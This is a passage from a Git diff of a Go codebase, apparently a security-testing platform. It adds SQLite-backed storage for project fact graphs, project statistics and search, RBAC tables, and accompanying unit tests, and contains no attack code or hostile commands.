out, nil +} diff --git a/internal/database/project_fact_edges.go b/internal/database/project_fact_edges.go new file mode 100644 index 00000000..9b2342c0 --- /dev/null +++ b/internal/database/project_fact_edges.go @@ -0,0 +1,410 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" + "time" + + "github.com/google/uuid" +) + +// ValidProjectFactEdgeTypes 项目事实图允许的边类型。 +var ValidProjectFactEdgeTypes = map[string]struct{}{ + "depends_on": {}, + "leads_to": {}, + "enables": {}, + "exploits": {}, + "discovered_on": {}, + "contains": {}, + "part_of": {}, + "supports": {}, +} + +// ProjectFactEdge 项目事实关系边(source → target)。 +type ProjectFactEdge struct { + ID string `json:"id"` + ProjectID string `json:"project_id"` + SourceFactKey string `json:"source_fact_key"` + TargetFactKey string `json:"target_fact_key"` + EdgeType string `json:"edge_type"` + Confidence string `json:"confidence"` // confirmed | tentative | deprecated + SourceConversationID string `json:"source_conversation_id,omitempty"` + CreatedAt time.Time `json:"created_at"` + UpdatedAt time.Time `json:"updated_at"` +} + +// ProjectFactEdgeInput 写入边时的输入(出边:source → To)。 +type ProjectFactEdgeInput struct { + To string `json:"to"` + Type string `json:"type"` + Confidence string `json:"confidence,omitempty"` +} + +// ProjectFactEdgeFromInput 写入入边时的输入(From → 当前事实)。 +type ProjectFactEdgeFromInput struct { + From string `json:"from"` + Type string `json:"type"` + Confidence string `json:"confidence,omitempty"` +} + +// ProjectFactGraphNode 图 API 节点。 +type ProjectFactGraphNode struct { + ID string `json:"id"` + FactKey string `json:"fact_key"` + Category string `json:"category"` + Label string `json:"label"` // 图节点短标签(截断) + Summary string `json:"summary"` // 完整摘要(侧栏等详情用) + Confidence string `json:"confidence"` + Type string `json:"type"` + Pinned bool `json:"pinned"` +} + +// ProjectFactGraphEdge 图 API 边。 +type ProjectFactGraphEdge struct { + ID string `json:"id"` + Source string `json:"source"` + Target string `json:"target"` + Type string `json:"type"` + Confidence string `json:"confidence"` +} + +// ProjectFactGraph 项目事实图。 +type ProjectFactGraph struct { + Nodes []ProjectFactGraphNode `json:"nodes"` + Edges []ProjectFactGraphEdge `json:"edges"` +} + +// ValidateProjectFactEdgeType 校验边类型。 +func ValidateProjectFactEdgeType(edgeType string) error { + edgeType = strings.TrimSpace(strings.ToLower(edgeType)) + if edgeType == "" { + return fmt.Errorf("edge type 不能为空") + } + if _, ok := ValidProjectFactEdgeTypes[edgeType]; !ok { + return fmt.Errorf("无效的 edge type: %s", edgeType) + } + return nil +} + +func normalizeEdgeConfidence(confidence string) string { + confidence = strings.TrimSpace(strings.ToLower(confidence)) + switch confidence { + case "confirmed", "deprecated": + return confidence + default: + return "tentative" + } +} + +// ListProjectFactEdgesByProject 列出项目全部边。 +func (db *DB) ListProjectFactEdgesByProject(projectID string) ([]*ProjectFactEdge, error) { + rows, err := db.Query( + `SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + COALESCE(source_conversation_id,''), created_at, updated_at + FROM project_fact_edges + WHERE project_id = ? + ORDER BY created_at ASC, rowid ASC`, + projectID, + ) + if err != nil { + return nil, err + } + defer rows.Close() + return scanProjectFactEdges(rows) +} + +// ListOutgoingProjectFactEdges 列出某事实的全部出边。 +func (db *DB) ListOutgoingProjectFactEdges(projectID, sourceFactKey string) ([]*ProjectFactEdge, error) { + rows, err := db.Query( + `SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + COALESCE(source_conversation_id,''), created_at, updated_at + FROM project_fact_edges + WHERE project_id = ? AND source_fact_key = ? + ORDER BY created_at ASC, rowid ASC`, + projectID, sourceFactKey, + ) + if err != nil { + return nil, err + } + defer rows.Close() + return scanProjectFactEdges(rows) +} + +// ListIncomingProjectFactEdges 列出某事实的全部入边。 +func (db *DB) ListIncomingProjectFactEdges(projectID, targetFactKey string) ([]*ProjectFactEdge, error) { + rows, err := db.Query( + `SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + COALESCE(source_conversation_id,''), created_at, updated_at + FROM project_fact_edges + WHERE project_id = ? AND target_fact_key = ? + ORDER BY created_at ASC, rowid ASC`, + projectID, targetFactKey, + ) + if err != nil { + return nil, err + } + defer rows.Close() + return scanProjectFactEdges(rows) +} + +// ReplaceOutgoingProjectFactEdges 替换某事实的全部出边(links 省略时不调用)。 +func (db *DB) ReplaceOutgoingProjectFactEdges(projectID, sourceFactKey, sourceConversationID string, inputs []ProjectFactEdgeInput) error { + sourceFactKey = strings.TrimSpace(sourceFactKey) + if sourceFactKey == "" { + return fmt.Errorf("source_fact_key 不能为空") + } + if _, err := db.Exec( + `DELETE FROM project_fact_edges WHERE project_id = ? AND source_fact_key = ?`, + projectID, sourceFactKey, + ); err != nil { + return fmt.Errorf("清除旧边失败: %w", err) + } + for _, in := range inputs { + target := strings.TrimSpace(in.To) + if target == "" { + continue + } + if err := ValidateFactKey(target); err != nil { + return fmt.Errorf("target fact_key 无效 (%s): %w", target, err) + } + if target == sourceFactKey { + return fmt.Errorf("边不能指向自身: %s", sourceFactKey) + } + if err := ValidateProjectFactEdgeType(in.Type); err != nil { + return err + } + edge := &ProjectFactEdge{ + ID: uuid.New().String(), + ProjectID: projectID, + SourceFactKey: sourceFactKey, + TargetFactKey: target, + EdgeType: strings.ToLower(strings.TrimSpace(in.Type)), + Confidence: normalizeEdgeConfidence(in.Confidence), + SourceConversationID: sourceConversationID, + CreatedAt: time.Now(), + UpdatedAt: time.Now(), + } + if err := db.insertProjectFactEdge(edge); err != nil { + return err + } + } + return nil +} + +// ReplaceIncomingProjectFactEdges 替换某事实的全部入边(From 为来源 fact_key)。 +func (db *DB) ReplaceIncomingProjectFactEdges(projectID, targetFactKey string, inputs []ProjectFactEdgeFromInput) error { + targetFactKey = strings.TrimSpace(targetFactKey) + if targetFactKey == "" { + return fmt.Errorf("target_fact_key 不能为空") + } + if _, err := db.Exec( + `DELETE FROM project_fact_edges WHERE project_id = ? AND target_fact_key = ?`, + projectID, targetFactKey, + ); err != nil { + return fmt.Errorf("清除旧入边失败: %w", err) + } + for _, in := range inputs { + source := strings.TrimSpace(in.From) + if source == "" { + continue + } + if err := ValidateFactKey(source); err != nil { + return fmt.Errorf("source fact_key 无效 (%s): %w", source, err) + } + if source == targetFactKey { + return fmt.Errorf("边不能指向自身: %s", targetFactKey) + } + if err := ValidateProjectFactEdgeType(in.Type); err != nil { + return err + } + sourceConversationID := "" + if srcFact, err := db.GetProjectFactByKey(projectID, source); err == nil && srcFact != nil { + sourceConversationID = srcFact.SourceConversationID + } + edge := &ProjectFactEdge{ + ID: uuid.New().String(), + ProjectID: projectID, + SourceFactKey: source, + TargetFactKey: targetFactKey, + EdgeType: strings.ToLower(strings.TrimSpace(in.Type)), + Confidence: normalizeEdgeConfidence(in.Confidence), + SourceConversationID: sourceConversationID, + CreatedAt: time.Now(), + UpdatedAt: time.Now(), + } + if err := db.insertProjectFactEdge(edge); err != nil { + return err + } + } + return nil +} + +// GetProjectFactEdge 按 ID 获取边。 +func (db *DB) GetProjectFactEdge(edgeID string) (*ProjectFactEdge, error) { + var e ProjectFactEdge + var createdAt, updatedAt string + err := db.QueryRow( + `SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + COALESCE(source_conversation_id,''), created_at, updated_at + FROM project_fact_edges WHERE id = ?`, edgeID, + ).Scan(&e.ID, &e.ProjectID, &e.SourceFactKey, &e.TargetFactKey, &e.EdgeType, &e.Confidence, + &e.SourceConversationID, &createdAt, &updatedAt) + if err != nil { + return nil, fmt.Errorf("边不存在") + } + e.CreatedAt = parseDBTime(createdAt) + e.UpdatedAt = parseDBTime(updatedAt) + return &e, nil +} + +// AddProjectFactEdge 新增单条边(已存在则更新 confidence)。 +func (db *DB) AddProjectFactEdge(projectID string, in ProjectFactEdgeInput, sourceFactKey, sourceConversationID string) (*ProjectFactEdge, error) { + sourceFactKey = strings.TrimSpace(sourceFactKey) + target := strings.TrimSpace(in.To) + if sourceFactKey == "" || target == "" { + return nil, fmt.Errorf("source 与 target 必填") + } + if sourceFactKey == target { + return nil, fmt.Errorf("边不能指向自身") + } + if err := ValidateProjectFactEdgeType(in.Type); err != nil { + return nil, err + } + if err := ValidateFactKey(target); err != nil { + return nil, err + } + now := time.Now() + e := &ProjectFactEdge{ + ID: uuid.New().String(), + ProjectID: projectID, + SourceFactKey: sourceFactKey, + TargetFactKey: target, + EdgeType: strings.ToLower(strings.TrimSpace(in.Type)), + Confidence: normalizeEdgeConfidence(in.Confidence), + SourceConversationID: sourceConversationID, + CreatedAt: now, + UpdatedAt: now, + } + _, err := db.Exec( + `INSERT INTO project_fact_edges ( + id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + source_conversation_id, created_at, updated_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + ON CONFLICT(project_id, source_fact_key, target_fact_key, edge_type) + DO UPDATE SET confidence = excluded.confidence, updated_at = excluded.updated_at`, + e.ID, e.ProjectID, e.SourceFactKey, e.TargetFactKey, e.EdgeType, e.Confidence, + nullIfEmpty(e.SourceConversationID), e.CreatedAt, e.UpdatedAt, + ) + if err != nil { + return nil, fmt.Errorf("添加边失败: %w", err) + } + // 返回最新 + rows, err := db.Query( + `SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + COALESCE(source_conversation_id,''), created_at, updated_at + FROM project_fact_edges + WHERE project_id = ? AND source_fact_key = ? AND target_fact_key = ? AND edge_type = ?`, + projectID, sourceFactKey, target, e.EdgeType, + ) + if err != nil { + return e, nil + } + defer rows.Close() + list, err := scanProjectFactEdges(rows) + if err != nil || len(list) == 0 { + return e, nil + } + return list[0], nil +} + +// DeleteProjectFactEdge 删除单条边。 +func (db *DB) DeleteProjectFactEdge(edgeID string) error { + res, err := db.Exec(`DELETE FROM project_fact_edges WHERE id = ?`, edgeID) + if err != nil { + return err + } + n, _ := res.RowsAffected() + if n == 0 { + return fmt.Errorf("边不存在") + } + return nil +} + +func (db *DB) insertProjectFactEdge(e *ProjectFactEdge) error { + _, err := db.Exec( + `INSERT INTO project_fact_edges ( + id, project_id, source_fact_key, target_fact_key, edge_type, confidence, + source_conversation_id, created_at, updated_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)`, + e.ID, e.ProjectID, e.SourceFactKey, e.TargetFactKey, e.EdgeType, e.Confidence, + nullIfEmpty(e.SourceConversationID), e.CreatedAt, e.UpdatedAt, + ) + if err != nil { + return fmt.Errorf("写入边失败: %w", err) + } + return nil +} + +// RenameProjectFactKeyEdges 事实 key 变更时同步边上的引用。 +func (db *DB) RenameProjectFactKeyEdges(projectID, oldKey, newKey string) error { + oldKey = strings.TrimSpace(oldKey) + newKey = strings.TrimSpace(newKey) + if oldKey == "" || newKey == "" || oldKey == newKey { + return nil + } + now := time.Now() + if _, err := db.Exec( + `UPDATE project_fact_edges SET source_fact_key = ?, updated_at = ? + WHERE project_id = ? AND source_fact_key = ?`, + newKey, now, projectID, oldKey, + ); err != nil { + return err + } + _, err := db.Exec( + `UPDATE project_fact_edges SET target_fact_key = ?, updated_at = ? + WHERE project_id = ? AND target_fact_key = ?`, + newKey, now, projectID, oldKey, + ) + return err +} + +// DeleteProjectFactEdgesForKey 删除与某 fact_key 相关的全部边。 +func (db *DB) DeleteProjectFactEdgesForKey(projectID, factKey string) error { + _, err := db.Exec( + `DELETE FROM project_fact_edges + WHERE project_id = ? AND (source_fact_key = ? OR target_fact_key = ?)`, + projectID, factKey, factKey, + ) + return err +} + +// DeprecateProjectFactEdgesForKey 将关联边标记为 deprecated。 +func (db *DB) DeprecateProjectFactEdgesForKey(projectID, factKey string) error { + now := time.Now() + _, err := db.Exec( + `UPDATE project_fact_edges SET confidence = 'deprecated', updated_at = ? + WHERE project_id = ? AND (source_fact_key = ? OR target_fact_key = ?) + AND confidence != 'deprecated'`, + now, projectID, factKey, factKey, + ) + return err +} + +func scanProjectFactEdges(rows *sql.Rows) ([]*ProjectFactEdge, error) { + var out []*ProjectFactEdge + for rows.Next() { + var e ProjectFactEdge + var createdAt, updatedAt string + if err := rows.Scan( + &e.ID, &e.ProjectID, &e.SourceFactKey, &e.TargetFactKey, &e.EdgeType, &e.Confidence, + &e.SourceConversationID, &createdAt, &updatedAt, + ); err != nil { + return nil, err + } + e.CreatedAt = parseDBTime(createdAt) + e.UpdatedAt = parseDBTime(updatedAt) + out = append(out, &e) + } + return out, rows.Err() +} diff --git a/internal/database/project_fact_upsert_test.go b/internal/database/project_fact_upsert_test.go new file mode 100644 index 00000000..c843d508 --- /dev/null +++ b/internal/database/project_fact_upsert_test.go @@ -0,0 +1,148 @@ +package database + +import ( + "path/filepath" + "testing" + + "go.uber.org/zap" +) + +func TestUpsertProjectFact_preservesBodyOnEmptyUpdate(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "facts.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + proj, err := db.CreateProject(&Project{Name: "test-facts"}) + if err != nil { + t.Fatal(err) + } + + const body = "## 攻击链\n1. step\n```http\nGET / HTTP/1.1\n```\n" + _, err = db.UpsertProjectFact(&ProjectFact{ + ProjectID: proj.ID, + FactKey: "finding/sqli-login", + Category: "finding", + Summary: "SQLi on /login", + Body: body, + }) + if err != nil { + t.Fatal(err) + } + + updated, err := db.UpsertProjectFact(&ProjectFact{ + ProjectID: proj.ID, + FactKey: "finding/sqli-login", + Summary: "SQLi on /login (confirmed)", + Body: "", + }) + if err != nil { + t.Fatal(err) + } + if updated.Summary != "SQLi on /login (confirmed)" { + t.Fatalf("summary=%q", updated.Summary) + } + if updated.Body != body { + t.Fatalf("returned body=%q want preserved attack chain", updated.Body) + } + + fromDB, err := db.GetProjectFactByKey(proj.ID, "finding/sqli-login") + if err != nil { + t.Fatal(err) + } + if fromDB.Body != body { + t.Fatalf("stored body=%q want preserved", fromDB.Body) + } +} + +func TestUpsertProjectFact_replacesBodyWhenProvided(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "facts.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + proj, err := db.CreateProject(&Project{Name: "test-facts"}) + if err != nil { + t.Fatal(err) + } + + _, err = db.UpsertProjectFact(&ProjectFact{ + ProjectID: proj.ID, + FactKey: "target/primary", + Summary: "v1", + Body: "old body", + }) + if err != nil { + t.Fatal(err) + } + + const newBody = "new body with evidence" + updated, err := db.UpsertProjectFact(&ProjectFact{ + ProjectID: proj.ID, + FactKey: "target/primary", + Summary: "v2", + Body: newBody, + }) + if err != nil { + t.Fatal(err) + } + if updated.Body != newBody { + t.Fatalf("body=%q want %q", updated.Body, newBody) + } +} + +func TestRestoreProjectFact(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "facts.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + proj, err := db.CreateProject(&Project{Name: "restore-test"}) + if err != nil { + t.Fatal(err) + } + key := "target/restore-me" + _, err = db.UpsertProjectFact(&ProjectFact{ + ProjectID: proj.ID, + FactKey: key, + Summary: "s", + Confidence: "confirmed", + }) + if err != nil { + t.Fatal(err) + } + if err := db.DeprecateProjectFact(proj.ID, key); err != nil { + t.Fatal(err) + } + if err := db.RestoreProjectFact(proj.ID, key, "confirmed"); err != nil { + t.Fatal(err) + } + f, err := db.GetProjectFactByKey(proj.ID, key) + if err != nil { + t.Fatal(err) + } + if f.Confidence != "confirmed" { + t.Fatalf("confidence=%q want confirmed", f.Confidence) + } + if err := db.RestoreProjectFact(proj.ID, key, ""); err == nil { + t.Fatal("expected error when not deprecated") + } +} + +func TestMergeFactBodyOnUpdate(t *testing.T) { + if got := mergeFactBodyOnUpdate("", "keep"); got != "keep" { + t.Fatalf("empty incoming: got %q", got) + } + if got := mergeFactBodyOnUpdate(" ", "keep"); got != "keep" { + t.Fatalf("whitespace incoming: got %q", got) + } + if got := mergeFactBodyOnUpdate("new", "old"); got != "new" { + t.Fatalf("non-empty incoming: got %q", got) + } +} diff --git a/internal/database/project_search_test.go b/internal/database/project_search_test.go new file mode 100644 index 00000000..62bc1111 --- /dev/null +++ b/internal/database/project_search_test.go @@ -0,0 +1,82 @@ +package database + +import ( + "path/filepath" + "testing" + + "go.uber.org/zap" +) + +func TestListProjectsSearchCaseInsensitive(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "projects-search.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + p1, err := db.CreateProject(&Project{Name: "Alpha Security Review", Status: "active"}) + if err != nil { + t.Fatal(err) + } + p2, err := db.CreateProject(&Project{Name: "beta-scan", Status: "active"}) + if err != nil { + t.Fatal(err) + } + if _, err := db.CreateProject(&Project{Name: "Other", Status: "archived"}); err != nil { + t.Fatal(err) + } + + cases := []struct { + name string + search string + status string + want []string + }{ + {name: "case insensitive name", search: "alpha", status: "active", want: []string{p1.ID}}, + {name: "upper query", search: "BETA", status: "active", want: []string{p2.ID}}, + {name: "search by id substring", search: p1.ID[:8], status: "", want: []string{p1.ID}}, + {name: "status filter", search: "alpha", status: "archived", want: nil}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + list, err := db.ListProjects(tc.status, tc.search, 50, 0) + if err != nil { + t.Fatal(err) + } + got := make([]string, 0, len(list)) + for _, p := range list { + got = append(got, p.ID) + } + if len(got) != len(tc.want) { + t.Fatalf("got %v want %v", got, tc.want) + } + for i := range got { + if got[i] != tc.want[i] { + t.Fatalf("got %v want %v", got, tc.want) + } + } + }) + } +} + +func TestProjectListSearchPatternEscapesWildcards(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "projects-like.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + p, err := db.CreateProject(&Project{Name: "100% coverage", Status: "active"}) + if err != nil { + t.Fatal(err) + } + list, err := db.ListProjects("active", "100%", 50, 0) + if err != nil { + t.Fatal(err) + } + if len(list) != 1 || list[0].ID != p.ID { + t.Fatalf("expected exact match for literal %% query, got %#v", list) + } +} diff --git a/internal/database/project_stats.go b/internal/database/project_stats.go new file mode 100644 index 00000000..2352309c --- /dev/null +++ b/internal/database/project_stats.go @@ -0,0 +1,125 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" +) + +// ProjectStats 项目聚合统计。 +type ProjectStats struct { + FactCount int `json:"fact_count"` + VulnCount int `json:"vuln_count"` + ConversationCount int `json:"conversation_count"` + SparseFactCount int `json:"sparse_fact_count"` +} + +// GetProjectStatsCounts 统计项目下事实、漏洞、对话数量(不含 sparse,由 project 包补全)。 +func (db *DB) GetProjectStatsCounts(projectID string) (*ProjectStats, error) { + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return nil, fmt.Errorf("project_id 不能为空") + } + if _, err := db.GetProject(projectID); err != nil { + return nil, err + } + stats := &ProjectStats{} + if err := db.QueryRow( + `SELECT COUNT(*) FROM project_facts WHERE project_id = ? AND confidence != 'deprecated'`, + projectID, + ).Scan(&stats.FactCount); err != nil { + return nil, fmt.Errorf("统计事实失败: %w", err) + } + if err := db.QueryRow( + `SELECT COUNT(*) FROM vulnerabilities WHERE project_id = ?`, + projectID, + ).Scan(&stats.VulnCount); err != nil { + return nil, fmt.Errorf("统计漏洞失败: %w", err) + } + if err := db.QueryRow( + `SELECT COUNT(*) FROM conversations WHERE project_id = ?`, + projectID, + ).Scan(&stats.ConversationCount); err != nil { + return nil, fmt.Errorf("统计对话失败: %w", err) + } + return stats, nil +} + +// ListProjectFactsForSparseCheck 返回用于待补全检测的事实字段(非 deprecated)。 +func (db *DB) ListProjectFactsForSparseCheck(projectID string) ([]struct { + Category string + FactKey string + Body string +}, error) { + rows, err := db.Query( + `SELECT category, fact_key, COALESCE(body,'') FROM project_facts WHERE project_id = ? AND confidence != 'deprecated'`, + projectID, + ) + if err != nil { + return nil, err + } + defer rows.Close() + var out []struct { + Category string + FactKey string + Body string + } + for rows.Next() { + var row struct { + Category string + FactKey string + Body string + } + if err := rows.Scan(&row.Category, &row.FactKey, &row.Body); err != nil { + return nil, err + } + out = append(out, row) + } + return out, rows.Err() +} + +// ListConversationsByProjectID 列出绑定到项目的对话。 +func (db *DB) ListConversationsByProjectID(projectID string, limit, offset int) ([]*Conversation, error) { + if limit <= 0 { + limit = 100 + } + rows, err := db.Query( + `SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id, role_name + FROM conversations WHERE project_id = ? ORDER BY updated_at DESC LIMIT ? OFFSET ?`, + projectID, limit, offset, + ) + if err != nil { + return nil, fmt.Errorf("查询项目对话失败: %w", err) + } + defer rows.Close() + + var conversations []*Conversation + for rows.Next() { + var conv Conversation + var createdAt, updatedAt string + var pinned int + var pid sql.NullString + var roleName sql.NullString + if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &pid, &roleName); err != nil { + return nil, err + } + if pid.Valid { + conv.ProjectID = strings.TrimSpace(pid.String) + } + if roleName.Valid { + conv.RoleName = normalizeConversationRoleName(roleName.String) + } + conv.CreatedAt = parseDBTime(createdAt) + conv.UpdatedAt = parseDBTime(updatedAt) + conv.Pinned = pinned != 0 + conversations = append(conversations, &conv) + } + return conversations, rows.Err() +} + +// CountConversationsByProjectID 统计项目绑定对话数。 +func (db *DB) CountConversationsByProjectID(projectID string) (int, error) { + var n int + err := db.QueryRow(`SELECT COUNT(*) FROM conversations WHERE project_id = ?`, projectID).Scan(&n) + return n, err +} diff --git a/internal/database/project_time_test.go b/internal/database/project_time_test.go new file mode 100644 index 00000000..b8303c5c --- /dev/null +++ b/internal/database/project_time_test.go @@ -0,0 +1,93 @@ +package database + +import ( + "encoding/json" + "os" + "path/filepath" + "testing" + "time" + + "go.uber.org/zap" +) + +func TestParseDBTime_projectFactFormats(t *testing.T) { + cases := []string{ + "2026-05-26 11:13:07.442143+08:00", + "2026-05-26 11:13:07", + "2026-05-26T11:13:07.442143+08:00", + } + for _, s := range cases { + got := parseDBTime(s) + if got.IsZero() { + t.Fatalf("parseDBTime(%q) returned zero", s) + } + } +} + +func TestListProjectFacts_updatedAtJSON(t *testing.T) { + root, err := os.Getwd() + if err != nil { + t.Skip(err) + } + dbPath := filepath.Join(root, "..", "..", "data", "conversations.db") + if _, err := os.Stat(dbPath); err != nil { + t.Skip("conversations.db not found") + } + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + projects, err := db.ListProjects("", "", 1, 0) + if err != nil || len(projects) == 0 { + t.Skip("no projects") + } + pid := projects[0].ID + + list, err := db.ListProjectFacts(pid, ProjectFactListFilter{}, 5, 0) + if err != nil { + t.Fatal(err) + } + if len(list) == 0 { + t.Skip("no facts") + } + for _, f := range list { + if f.UpdatedAt.IsZero() { + t.Fatalf("fact %s UpdatedAt is zero after ListProjectFacts", f.FactKey) + } + b, err := json.Marshal(f) + if err != nil { + t.Fatal(err) + } + var m map[string]interface{} + if err := json.Unmarshal(b, &m); err != nil { + t.Fatal(err) + } + raw, ok := m["updated_at"].(string) + if !ok || raw == "" || raw[:4] == "0001" { + t.Fatalf("bad updated_at in JSON: %v", m["updated_at"]) + } + } +} + +func TestParseDBTime_zeroOnGarbage(t *testing.T) { + if !parseDBTime("").IsZero() { + t.Fatal("expected zero for empty") + } +} + +// Ensure RFC3339 round-trip used by API is after year 2000. +func TestParseDBTime_marshalRoundTrip(t *testing.T) { + s := "2026-05-26 11:13:07.442143+08:00" + tm := parseDBTime(s) + b, err := json.Marshal(tm) + if err != nil { + t.Fatal(err) + } + var back time.Time + if err := json.Unmarshal(b, &back); err != nil { + t.Fatal(err) + } + if back.IsZero() { + t.Fatalf("unmarshal zero from %s", string(b)) + } +} diff --git a/internal/database/rbac.go b/internal/database/rbac.go new file mode 100644 index 00000000..28e86502 --- /dev/null +++ b/internal/database/rbac.go @@ -0,0 +1,1454 @@ +package database + +import ( + "database/sql" + "errors" + "fmt" + "strings" + "time" + + "github.com/google/uuid" +) + +const ( + RBACSystemRoleAdmin = "admin" + RBACSystemRoleOperator = "operator" + RBACSystemRoleAuditor = "auditor" + RBACSystemRoleViewer = "viewer" + + RBACScopeAll = "all" + RBACScopeAssigned = "assigned" + RBACScopeOwn = "own" + + RBACMaxBatchResourceAssignments = 100 +) + +var rbacAssignableResourceTables = map[string]string{ + "project": "projects", + "conversation": "conversations", + "vulnerability": "vulnerabilities", + "asset": "assets", + "webshell": "webshell_connections", + "batch_task": "batch_task_queues", + "c2_listener": "c2_listeners", +} + +// RBACUser is a local platform account. +type RBACUser struct { + ID string `json:"id"` + Username string `json:"username"` + DisplayName string `json:"displayName,omitempty"` + PasswordHash string `json:"-"` + Enabled bool `json:"enabled"` + IsBuiltin bool `json:"isBuiltin"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// RBACRole groups permissions and a resource visibility scope. +type RBACRole struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description,omitempty"` + Scope string `json:"scope"` + IsSystem bool `json:"isSystem"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// RBACResourceAssignment grants a user access to one resource. +type RBACResourceAssignment struct { + ID string `json:"id"` + UserID string `json:"userId"` + ResourceType string `json:"resourceType"` + ResourceID string `json:"resourceId"` + ResourceLabel string `json:"resourceLabel,omitempty"` + ResourceDetail string `json:"resourceDetail,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// RBACResourceOption is a safe, minimal projection used by the assignment picker. +// It intentionally excludes resource contents and credentials. +type RBACResourceOption struct { + ID string `json:"id"` + Label string `json:"label"` + Detail string `json:"detail,omitempty"` +} + +// RBACAccess is the resolved authorization profile for one user. +type RBACAccess struct { + User RBACUser `json:"user"` + Roles []RBACRole `json:"roles"` + Permissions map[string]bool `json:"permissions"` + PermissionScopes map[string]string `json:"permissionScopes,omitempty"` + // Scope is retained as the broadest effective scope for UI compatibility. + // Authorization decisions must use PermissionScopes so a global read role + // cannot widen an unrelated write permission from another role. + Scope string `json:"scope"` +} + +func (db *DB) initRBACTables() error { + stmts := []string{ + `CREATE TABLE IF NOT EXISTS rbac_users ( + id TEXT PRIMARY KEY, + username TEXT NOT NULL UNIQUE, + display_name TEXT NOT NULL DEFAULT '', + password_hash TEXT NOT NULL, + enabled INTEGER NOT NULL DEFAULT 1, + is_builtin INTEGER NOT NULL DEFAULT 0, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL + );`, + `CREATE TABLE IF NOT EXISTS rbac_roles ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL UNIQUE, + description TEXT NOT NULL DEFAULT '', + scope TEXT NOT NULL DEFAULT 'assigned', + is_system INTEGER NOT NULL DEFAULT 0, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL + );`, + `CREATE TABLE IF NOT EXISTS rbac_permissions ( + key TEXT PRIMARY KEY, + description TEXT NOT NULL DEFAULT '', + created_at DATETIME NOT NULL + );`, + `CREATE TABLE IF NOT EXISTS rbac_role_permissions ( + role_id TEXT NOT NULL, + permission_key TEXT NOT NULL, + created_at DATETIME NOT NULL, + PRIMARY KEY (role_id, permission_key), + FOREIGN KEY (role_id) REFERENCES rbac_roles(id) ON DELETE CASCADE, + FOREIGN KEY (permission_key) REFERENCES rbac_permissions(key) ON DELETE CASCADE + );`, + `CREATE TABLE IF NOT EXISTS rbac_user_roles ( + user_id TEXT NOT NULL, + role_id TEXT NOT NULL, + created_at DATETIME NOT NULL, + PRIMARY KEY (user_id, role_id), + FOREIGN KEY (user_id) REFERENCES rbac_users(id) ON DELETE CASCADE, + FOREIGN KEY (role_id) REFERENCES rbac_roles(id) ON DELETE CASCADE + );`, + `CREATE TABLE IF NOT EXISTS rbac_resource_assignments ( + id TEXT PRIMARY KEY, + user_id TEXT NOT NULL, + resource_type TEXT NOT NULL, + resource_id TEXT NOT NULL, + created_at DATETIME NOT NULL, + FOREIGN KEY (user_id) REFERENCES rbac_users(id) ON DELETE CASCADE, + UNIQUE(user_id, resource_type, resource_id) + );`, + `CREATE TABLE IF NOT EXISTS robot_user_bindings ( + id TEXT PRIMARY KEY, + platform TEXT NOT NULL, + external_user_id TEXT NOT NULL, + rbac_user_id TEXT NOT NULL, + enabled INTEGER NOT NULL DEFAULT 1, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL, + FOREIGN KEY (rbac_user_id) REFERENCES rbac_users(id) ON DELETE CASCADE, + UNIQUE(platform, external_user_id) + );`, + `CREATE TABLE IF NOT EXISTS robot_binding_codes ( + code_hash TEXT PRIMARY KEY, + rbac_user_id TEXT NOT NULL, + expires_at DATETIME NOT NULL, + used_at DATETIME, + created_at DATETIME NOT NULL, + FOREIGN KEY (rbac_user_id) REFERENCES rbac_users(id) ON DELETE CASCADE + );`, + `CREATE TABLE IF NOT EXISTS chat_upload_artifacts ( + relative_path TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + owner_user_id TEXT NOT NULL, + created_at DATETIME NOT NULL, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE + );`, + `CREATE TABLE IF NOT EXISTS c2_payload_artifacts ( + filename TEXT PRIMARY KEY, + payload_id TEXT NOT NULL, + listener_id TEXT NOT NULL, + owner_user_id TEXT NOT NULL, + created_at DATETIME NOT NULL + );`, + `CREATE INDEX IF NOT EXISTS idx_rbac_user_roles_user ON rbac_user_roles(user_id);`, + `CREATE INDEX IF NOT EXISTS idx_rbac_role_permissions_role ON rbac_role_permissions(role_id);`, + `CREATE INDEX IF NOT EXISTS idx_rbac_assignments_user_resource ON rbac_resource_assignments(user_id, resource_type, resource_id);`, + `CREATE INDEX IF NOT EXISTS 